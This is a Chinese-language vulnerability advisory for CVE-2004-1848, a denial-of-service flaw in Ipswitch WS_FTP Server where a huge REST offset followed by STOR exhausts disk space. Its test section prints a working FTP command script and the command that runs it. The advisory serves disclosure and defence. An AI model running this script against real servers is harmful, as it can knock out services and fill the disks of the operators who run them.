发布日期：2004-03-23
更新日期：2004-03-29

受影响系统：

Ipswitch WS FTP Server 4.0.2.EVAL

描述：

---

CVE(CAN) ID: CVE-2004-1848

Ipswitch WS_FTP Server是一款适用于Windows系统的FTP服务程序。

Ipswitch WS_FTP Server REST命令实现存在问题，远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。

任何包含目录写权限的用户，可消耗光所有分区的磁盘空间，而导致WS_FTP产生拒绝服务。REST命令用于更改文件指针，确定新数据可以写到文件中的位置，以便下次用户使用STOR发送上传命令。用户可以通过指定一个超大值作为参数给REST命令建立任意大小文件(可大2^64-1字节)，然后使用STOR命令发个一个小的文件，WS_FTP服务器没有计算从原始文件末开始到新文件指针位置的额外字节大小，因此在使用后续的STOR命令上传文件时可消耗大量磁盘空间，而造成拒绝服务。

<*来源：Hugh Mann （hughmann@hotmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=108006717731989&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Hugh Mann （hughmann@hotmail.com）提供了如下测试方法：

建立如下ftpcmds.txt文件：

<<<<<<<<<<<<
open ftp.server.mob
username
password
!echo.>2byte.txt
!echo.>2byte_2.txt
dir
put 2byte_2.txt
dir
del 2byte_2.txt
quote REST 1073741822
put 2byte.txt
dir
put 2byte_2.txt
del 2byte.txt
del 2byte_2.txt
!del 2byte.txt
!del 2byte_2.txt
quit
>>>>>>>>>>>>

然后执行如下命令：

C:\>ftp -s:ftpcmds.txt

建议：

---

厂商补丁：

Ipswitch
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.ipswitch.com/

浏览次数：2882
严重程度：0（网友投票）